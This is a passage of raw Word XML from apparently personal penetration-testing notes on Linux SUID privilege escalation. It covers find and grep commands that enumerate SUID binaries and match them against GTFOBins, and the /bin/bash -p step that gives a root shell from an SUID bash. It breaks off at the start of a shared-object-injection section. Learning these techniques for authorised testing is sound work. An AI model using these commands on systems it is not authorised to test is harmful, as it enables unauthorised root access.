          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-type f restricts the search to regular files (ignores directories, devices, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1491"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2120900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="487" name="image475.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image475.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId70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20C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1491"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you get output like this, go to the </w:t>
      </w:r>
      <w:hyperlink r:id="rId701">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">GTFOBins</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> website and copy and paste the binaries (WITHOUT THE FILE PATH) and look to see if there are any SUID privilege escalations. For example, copy and paste "gpasswd" and "capsh". </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1491"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you find it, look at the "SUID" section and follow instructions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020C5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020C6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pla3r1sy3bi0" w:id="284"/>
      <w:bookmarkEnd w:id="284"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Filter out common SUID binaries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020C7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -4000 -type f 2&gt;/dev/null |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020C8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -v -E '^(/usr/bin/passwd|/usr/bin/su|/usr/bin/sudo|/usr/bin/chsh|/usr/bin/chfn|/usr/bin/newgrp|/usr/bin/mount|/usr/bin/umount|/usr/bin/gpasswd|/usr/bin/at|/bin/ping|/bin/ping6|/bin/umount|/bin/mount|/usr/bin/fusermount3?|/usr/bin/pkexec|/usr/lib/openssh/ssh-keysign|/usr/lib/dbus-1\.0/dbus-daemon-launch-helper|/usr/lib/policykit-1/polkit-agent-helper-1|/usr/libexec/polkit-agent-helper-1|/usr/lib/snapd/snap-confine|/snap/.*)$'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020C9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020CA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I also made a file in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~/standardSUID.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so you can do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1277"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -4000 -type f 2&gt;/dev/null | sort | grep -vxF -f SUIDstandard.txt | grep -v '^/snap/'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1277"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is more scalable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1277"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can add more to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUIDstandard.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020CE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020CF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020D0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or, if you have a file locally with the output of the SUID, do this:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1401"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat SUID.txt | grep -vxF -f SUIDstandard.txt | grep -v '^/snap/'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020D2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020D3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020D4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_v1wd2ukzcez6" w:id="285"/>
      <w:bookmarkEnd w:id="285"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to quickly check if something is in GTFOBins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020D5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I compiled a list of all the binaries in GTFOBins in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~/SUIDgtfoBins.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">However, if GTFOBins gets updated, it won't include the new ones</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020D7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020D8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To use it, do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1105"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -4000 -type f 2&gt;/dev/null | grep -F -f SUIDgtfoBins.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020DB">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or, if you have a file locally with the output of the SUID, do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1404"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> SUID.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | grep -F -f SUIDgtfoBins.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020DD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020DE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020DF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_r9cx2eipua70" w:id="286"/>
      <w:bookmarkEnd w:id="286"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash with SUID bit set</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020E1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6056076" cy="447415"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="495" name="image487.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image487.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId702"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6056076" cy="447415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020E2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020E3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From here you would simply type </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash -p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to get root, since this will run /bin/bash with the permissions of the owner of the file, which as you can see from here, is root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020E4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020E5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The -p option in bash preserves the effective user ID (euid) when the shell is started with set-user-ID (SUID) or set-group-ID (SGID) privileges. Without -p, Bash normally drops elevated privileges (e.g., root) for safety when started under SUID. The -p flag tells Bash not to drop those privileges, allowing you to retain root access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020E6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gpsvq585iljm" w:id="287"/>
      <w:bookmarkEnd w:id="287"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shared Object Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020E8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020E9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from Tib3rius SUID Video:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020EA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find SUID/SGID files on the target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2&gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-rwsr-sr-x 1 root staff 9861 May 14 2017 /usr/local/bin/suid-so</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="629"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020F0">
